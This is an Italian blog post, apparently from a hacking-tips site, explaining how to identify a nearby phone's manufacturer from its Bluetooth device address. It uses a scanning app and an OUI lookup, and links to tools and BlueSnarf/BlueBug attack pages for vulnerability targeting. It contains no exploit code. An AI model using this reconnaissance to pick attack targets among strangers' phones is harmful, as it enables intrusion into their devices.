Tramite il Bluetooth fingerprinting possiamo stabilire da remoto la marca di un cellulare , e quindi capire se si tratta di un Nokia piuttosto che di un Motorola. Una tecnica più sofisticata eseguita con un software scritto in perl (<a href="http://trifinite.org/Downloads/bp_v01-3.zip" title="Blueprint" id="r9no">Blueprint</a>) è in grado di identificare anche il modello, ed è quindi in grado di stabilire se il cellulare è vulnerabile ad attacchi <a href="http://trifinite.org/trifinite_stuff_bluesnarf.html" title="BlueSnarf" id="kpda">BlueSnarf</a> o <a href="http://trifinite.org/trifinite_stuff_bluebug.html" title="BlueBug" id="icv4">BlueBug</a> .<br id="fdgg" /><br id="h._m" />Quello di cui parlo qui è una tecnica più semplice e più artigianale, basata sull&#8217;interpretazione del Bluetooth Device Address (BT_ADDR).<br id="uilb" /><br id="bfn3" />Il BT_ADDR è un indirizzo di cui tutti i dispositivi Bluetooth sono dotati. In realtà si tratta di un <a href="http://en.wikipedia.org/wiki/Mac_address" title="MAC address" id="c8o9">MAC address</a>, in tutto uguale al MAC address di una scheda Ethernet.<br id="n-23" />Il Bluetooth Device Address è un numero di 48 bit divisi in sei byte: MM:MM:MM:XX:XX:XX.<br id="bb2g" /><br id="jkxe" />Le parti del BT_ADDR contrassegnata dalle XX non ci sono molto utili, perché assegnati dai costruttori casualmente o più probabilmente con criteri interni. Quello che è interessante è la prima parte dell&#8217;indirizzo, ovvero la parte contrassegnata dalle MM.<br id="lrfb" /><br id="qazr" />I primi 3 byte di un MAC address identificano univocamente il costruttore. Per esempio, se i primi 3 byte del BT_ADDR sono 00:11:9F significa che il telefonino è un Nokia, in quanto questi indirizzi sono assegnati alla Nokia.<br id="oyo5" /><br />
Per mettere in pratica questa tecnica occorre procurarsi il BT_ADDR del telefonino da valutare e quindi cercare la corrispondenza del codice.</p>
<p>Ottenere il BT_ADDR è abbastanza semplice: si può usare <a href="http://trifinite.org/trifinite_stuff_blooover.html" title="BlueOver" id="gfex">BlueOver</a>, un software in Java funzionante su qualsiasi cellulare recente. Questo programma permette di effettuare una scansione e rilevare i cellulari vicini mostrando il relativo BT_ADDR.</p>
<p>Una volta ottenuto il BT_ADDR basterà cercare su Internet il codice per risalire al costruttore. Per farlo si può usare il fornitissimo database a questo indirizzo: <a href="http://www.coffer.com/mac_find/" title="http://www.coffer.com/mac_find/" id="ywks">http://www.coffer.com/mac_find/</a></p>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2008/10/28/bluetooth-fingerprinting-manuale/&amp;title=Bluetooth+Fingerprinting+Manuale" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a Del.icio.us" alt="Aggiungi 'Bluetooth Fingerprinting Manuale' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2008/10/28/bluetooth-fingerprinting-manuale/&amp;title=Bluetooth+Fingerprinting+Manuale" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a digg" alt="Aggiungi 'Bluetooth Fingerprinting Manuale' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2008/10/28/bluetooth-fingerprinting-manuale/" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a Technorati" alt="Aggiungi 'Bluetooth Fingerprinting Manuale' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2008/10/28/bluetooth-fingerprinting-manuale/&amp;title=Bluetooth+Fingerprinting+Manuale" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a Google Bookmarks" alt="Aggiungi 'Bluetooth Fingerprinting Manuale' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2008/10/28/bluetooth-fingerprinting-manuale/&amp;title=Bluetooth+Fingerprinting+Manuale" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a Segnalo" alt="Aggiungi 'Bluetooth Fingerprinting Manuale' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2008/10/28/bluetooth-fingerprinting-manuale/&amp;title=Bluetooth+Fingerprinting+Manuale" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a OKnotizie" alt="Aggiungi 'Bluetooth Fingerprinting Manuale' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=Bluetooth+Fingerprinting+Manuale&amp;url=http://www.pillolhacking.net/2008/10/28/bluetooth-fingerprinting-manuale/" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a Diggita" alt="Aggiungi 'Bluetooth Fingerprinting Manuale' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2008/10/28/bluetooth-fingerprinting-manuale/&amp;t=Bluetooth+Fingerprinting+Manuale" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a FaceBook" alt="Aggiungi 'Bluetooth Fingerprinting Manuale' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2008/10/28/bluetooth-fingerprinting-manuale/&amp;title=Bluetooth+Fingerprinting+Manuale" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a Upnews" alt="Aggiungi 'Bluetooth Fingerprinting Manuale' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=Bluetooth+Fingerprinting+Manuale&amp;url=http://www.pillolhacking.net/2008/10/28/bluetooth-fingerprinting-manuale/" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a NotizieFlash" alt="Aggiungi 'Bluetooth Fingerprinting Manuale' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2008/10/28/bluetooth-fingerprinting-manuale/" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a Twitter" alt="Aggiungi 'Bluetooth Fingerprinting Manuale' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=Bluetooth+Fingerprinting+Manuale&amp;url=http://www.pillolhacking.net/2008/10/28/bluetooth-fingerprinting-manuale/" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a Technotizie" alt="Aggiungi 'Bluetooth Fingerprinting Manuale' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=Bluetooth+Fingerprinting+Manuale&amp;url=http://www.pillolhacking.net/2008/10/28/bluetooth-fingerprinting-manuale/" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'Bluetooth Fingerprinting Manuale' a FriendFeed" alt="Aggiungi 'Bluetooth Fingerprinting Manuale' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2008/10/28/bluetooth-fingerprinting-manuale/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced

Served from: www.pillolhacking.net @ 2012-02-05 10:31:05 -->
